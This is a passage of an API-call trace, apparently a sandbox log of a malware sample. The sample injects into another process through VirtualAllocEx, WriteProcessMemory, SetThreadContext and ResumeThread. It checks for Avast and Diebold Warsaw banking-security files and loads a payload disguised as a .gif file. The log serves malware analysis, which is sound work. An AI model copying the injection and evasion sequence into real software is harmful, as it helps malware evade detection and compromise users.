[70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0168.131] ReadProcessMemory (in: hProcess=0x124, lpBaseAddress=0x7ffd7008, lpBuffer=0x1b0c74, nSize=0x4, lpNumberOfBytesRead=0x1b0c7c | out: lpBuffer=0x1b0c74*, lpNumberOfBytesRead=0x1b0c7c*=0x4) returned 1
[0168.131] VirtualAllocEx (hProcess=0x124, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0168.131] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1c10000
[0168.131] VirtualAlloc (lpAddress=0x1c10000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x1c10000
[0168.132] VirtualAlloc (lpAddress=0x1bc8000, dwSize=0x48000, flAllocationType=0x1000, flProtect=0x4) returned 0x1bc8000
[0168.137] WriteProcessMemory (in: hProcess=0x124, lpBaseAddress=0x400000, lpBuffer=0x1bc62c8*, nSize=0x63000, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1bc62c8*, lpNumberOfBytesWritten=0x1b0c7c*=0x63000) returned 1
[0168.148] WriteProcessMemory (in: hProcess=0x124, lpBaseAddress=0x7ffd7008, lpBuffer=0x1b0c78*, nSize=0x4, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1b0c78*, lpNumberOfBytesWritten=0x1b0c7c*=0x4) returned 1
[0168.148] SetThreadContext (hThread=0x128, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd7000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0xafad8, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0168.148] ResumeThread (hThread=0x128) returned 0x1
[0168.177] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0168.178] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0168.178] GlobalUnlock (hMem=0x189000c) returned 0
[0168.178] GlobalHandle (pMem=0x1fd0f0) returned 0x1890004
[0168.178] GlobalUnlock (hMem=0x1890004) returned 0
[0168.184] Sleep (dwMilliseconds=0xe74e)
[0178.223] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0178.223] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0178.224] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0178.224] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0178.224] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130
[0178.224] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c8*=0) returned 0x0
[0178.224] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0178.224] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x5e000
[0178.224] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0178.226] GlobalLock (hMem=0x1890004) returned 0x1fd0f0
[0178.226] ReadFile (in: hFile=0x130, lpBuffer=0x1fd0f0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0xee1dc, lpOverlapped=0x0 | out: lpBuffer=0x1fd0f0*, lpNumberOfBytesRead=0xee1dc*=0x5e000, lpOverlapped=0x0) returned 1
[0178.228] CloseHandle (hObject=0x130) returned 1
[0178.228] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.229] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.229] GlobalUnlock (hMem=0x189000c) returned 0
[0178.229] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4000, uFlags=0x2) returned 0x189000c
[0178.229] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.229] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.229] GlobalUnlock (hMem=0x189000c) returned 0
[0178.229] GlobalReAlloc (hMem=0x189000c, dwBytes=0x6000, uFlags=0x2) returned 0x189000c
[0178.230] GlobalLock (hMem=0x189000c) returned 0x25f110
[0178.230] GlobalHandle (pMem=0x25f110) returned 0x189000c
[0178.230] GlobalUnlock (hMem=0x189000c) returned 0
[0178.230] GlobalReAlloc (hMem=0x189000c, dwBytes=0x8000, uFlags=0x2) returned 0x189000c
[0178.231] GlobalLock (hMem=0x189000c) returned 0x265120
[0178.232] GlobalHandle (pMem=0x265120) returned 0x189000c
[0178.232] GlobalUnlock (hMem=0x189000c) returned 0
[0178.232] GlobalReAlloc (hMem=0x189000c, dwBytes=0xa000, uFlags=0x2) returned 0x189000c
[0178.232] GlobalLock (hMem=0x189000c) returned 0x265120
[0178.233] GlobalHandle (pMem=0x265120) returned 0x189000c
[0178.233] GlobalUnlock (hMem=0x189000c) returned 0
[0178.233] GlobalReAlloc (hMem=0x189000c, dwBytes=0xc000, uFlags=0x2) returned 0x189000c
[0178.233] GlobalLock (hMem=0x189000c) returned 0x26f130
[0178.234] GlobalHandle (pMem=0x26f130) returned 0x189000c
[0178.234] GlobalUnlock (hMem=0x189000c) returned 0
[0178.234] GlobalReAlloc (hMem=0x189000c, dwBytes=0xe000, uFlags=0x2) returned 0x189000c
[0178.234] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.235] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.235] GlobalUnlock (hMem=0x189000c) returned 0
[0178.235] GlobalReAlloc (hMem=0x189000c, dwBytes=0x10000, uFlags=0x2) returned 0x189000c
[0178.235] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.236] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.236] GlobalUnlock (hMem=0x189000c) returned 0
[0178.236] GlobalReAlloc (hMem=0x189000c, dwBytes=0x12000, uFlags=0x2) returned 0x189000c
[0178.236] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.236] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.236] GlobalUnlock (hMem=0x189000c) returned 0
[0178.237] GlobalReAlloc (hMem=0x189000c, dwBytes=0x14000, uFlags=0x2) returned 0x189000c
[0178.237] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.237] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.237] GlobalUnlock (hMem=0x189000c) returned 0
[0178.237] GlobalReAlloc (hMem=0x189000c, dwBytes=0x16000, uFlags=0x2) returned 0x189000c
[0178.237] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.238] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.238] GlobalUnlock (hMem=0x189000c) returned 0
[0178.238] GlobalReAlloc (hMem=0x189000c, dwBytes=0x18000, uFlags=0x2) returned 0x189000c
[0178.238] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.239] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.239] GlobalUnlock (hMem=0x189000c) returned 0
[0178.239] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1a000, uFlags=0x2) returned 0x189000c
[0178.239] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.240] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.240] GlobalUnlock (hMem=0x189000c) returned 0
[0178.240] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1c000, uFlags=0x2) returned 0x189000c
[0178.240] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.241] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.241] GlobalUnlock (hMem=0x189000c) returned 0
[0178.241] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1e000, uFlags=0x2) returned 0x189000c
[0178.241] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.241] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.241] GlobalUnlock (hMem=0x189000c) returned 0
[0178.241] GlobalReAlloc (hMem=0x189000c, dwBytes=0x20000, uFlags=0x2) returned 0x189000c
[0178.241] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.242] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.242] GlobalUnlock (hMem=0x189000c) returned 0
[0178.242] GlobalReAlloc (hMem=0x189000c, dwBytes=0x22000, uFlags=0x2) returned 0x189000c
[0178.243] GlobalLock (hMem=0x189000c) returned 0x27b110
[0178.244] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0178.244] GlobalUnlock (hMem=0x189000c) returned 0
[0178.244] GlobalReAlloc (hMem=0x189000c, dwBytes=0x24000, uFlags=0x2) returned 0x189000c
[0178.244] GlobalLock (hMem=0x189000c) returned 0x27b110
[0178.245] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0178.245] GlobalUnlock (hMem=0x189000c) returned 0
[0178.245] GlobalReAlloc (hMem=0x189000c, dwBytes=0x26000, uFlags=0x2) returned 0x189000c
[0178.246] GlobalLock (hMem=0x189000c) returned 0x29f120
[0178.247] GlobalHandle (pMem=0x29f120) returned 0x189000c
[0178.247] GlobalUnlock (hMem=0x189000c) returned 0
[0178.247] GlobalReAlloc (hMem=0x189000c, dwBytes=0x28000, uFlags=0x2) returned 0x189000c
[0178.247] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.248] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.248] GlobalUnlock (hMem=0x189000c) returned 0
[0178.248] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2a000, uFlags=0x2) returned 0x189000c
[0178.248] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.248] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.248] GlobalUnlock (hMem=0x189000c) returned 0
[0178.248] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2c000, uFlags=0x2) returned 0x189000c
[0178.248] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.249] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.249] GlobalUnlock (hMem=0x189000c) returned 0
[0178.249] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2e000, uFlags=0x2) returned 0x189000c
[0178.249] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.250] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.250] GlobalUnlock (hMem=0x189000c) returned 0
[0178.250] GlobalReAlloc (hMem=0x189000c, dwBytes=0x30000, uFlags=0x2) returned 0x189000c
[0178.250] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.251] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.251] GlobalUnlock (hMem=0x189000c) returned 0
[0178.251] GlobalReAlloc (hMem=0x189000c, dwBytes=0x32000, uFlags=0x2) returned 0x189000c
[0178.251] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.251] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.251] GlobalUnlock (hMem=0x189000c) returned 0
[0178.251] GlobalReAlloc (hMem=0x189000c, dwBytes=0x34000, uFlags=0x2) returned 0x189000c
[0178.251] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.252] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.252] GlobalUnlock (hMem=0x189000c) returned 0
[0178.252] GlobalReAlloc (hMem=0x189000c, dwBytes=0x36000, uFlags=0x2) returned 0x189000c
[0178.252] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.253] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.253] GlobalUnlock (hMem=0x189000c) returned 0
[0178.253] GlobalReAlloc (hMem=0x189000c, dwBytes=0x38000, uFlags=0x2) returned 0x189000c
[0178.253] GlobalLock (hMem=0x189000c) returned 0x25b100
[0178.254] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0178.254] GlobalUnlock (hMem=0x189000c) returned 0
[0178.254] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3a000, uFlags=0x2) returned 0x189000c
